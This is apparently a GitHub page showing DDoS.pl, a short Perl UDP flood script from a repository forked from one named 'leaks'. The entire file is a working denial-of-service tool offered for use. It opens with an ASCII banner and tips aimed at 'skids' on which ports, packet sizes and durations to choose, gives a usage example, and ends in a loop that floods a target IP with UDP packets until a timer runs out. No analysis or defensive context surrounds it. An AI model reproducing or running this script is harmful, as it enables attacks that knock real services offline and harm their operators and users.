forked from sX89q/leaks
-
Notifications
You must be signed in to change notification settings - Fork 0
/
DDoS.pl
49 lines (42 loc) · 2.22 KB
/
DDoS.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/perl
#Created by ~TwentyOne
#Reccomendations (For skids):
#IP - Don't DDoS Government Websites.
#Port - Use '80' for HTTP (Most Common) or '53' for DNS or '443' for https.
#Size - Use '100 - 1000' (Reccomended).
#Time - Depending on the bandwith of your server, use how ever much you want (You can always press Ctrl-C to cancel).
use Socket;
use strict;
print '
/$$$$$$$$ /$$ /$$$$$$
|__ $$__/ | $$ /$$__ $$
| $$/$$ /$$ /$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$ /$| $$ \ $$/$$$$$$$ /$$$$$$ \'s (PUBLIC) DDoS Script ;)
| $| $$ | $$ | $$/$$__ $| $$__ $|_ $$_/ | $$ | $| $$ | $| $$__ $$/$$__ $$
| $| $$ | $$ | $| $$$$$$$| $$ \ $$ | $$ | $$ | $| $$ | $| $$ \ $| $$$$$$$$
| $| $$ | $$ | $| $$_____| $$ | $$ | $$ /$| $$ | $| $$ | $| $$ | $| $$_____/
| $| $$$$$/$$$$| $$$$$$| $$ | $$ | $$$$| $$$$$$| $$$$$$| $$ | $| $$$$$$$
|__/\_____/\___/ \_______|__/ |__/ \___/ \____ $$\______/|__/ |__/\_______/
/$$ | $$
| $$$$$$/
\______/
';
print "\n";
if ($#ARGV != 3) {
print "\n\t\t\t***Error command must recieve four arguements***\n";
print "-Ex) perl DDoS.pl 1.1.1.1 80 1000 300\n";
print "-Therefore DDoSing the IP '1.1.1.1' for '300' seconds on port '80' using '1000' packets\n\n";
exit(1);
}
my ($ip,$port,$size,$time) = @ARGV;
my ($iaddr,$endtime,$psize,$pport);
$iaddr = inet_aton("$ip") or die "Cannot connect to $ip\n";
$endtime = time() + ($time ? $time : 1000000);
socket(flood, PF_INET, SOCK_DGRAM, 17);
print "~To cancel the attack press \'Ctrl-C\'\n\n";
print "|IP|\t\t |Port|\t\t |Size|\t\t |Time|\n";
print "|$ip|\t |$port|\t\t |$size|\t\t |$time|\n";
print "To cancel the attack press 'Ctrl-C'\n" unless $time;
for (;time() <= $endtime;) {
$psize = $size ? $size : int(rand(1500-64)+64) ;
$pport = $port ? $port : int(rand(65500))+1;
send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}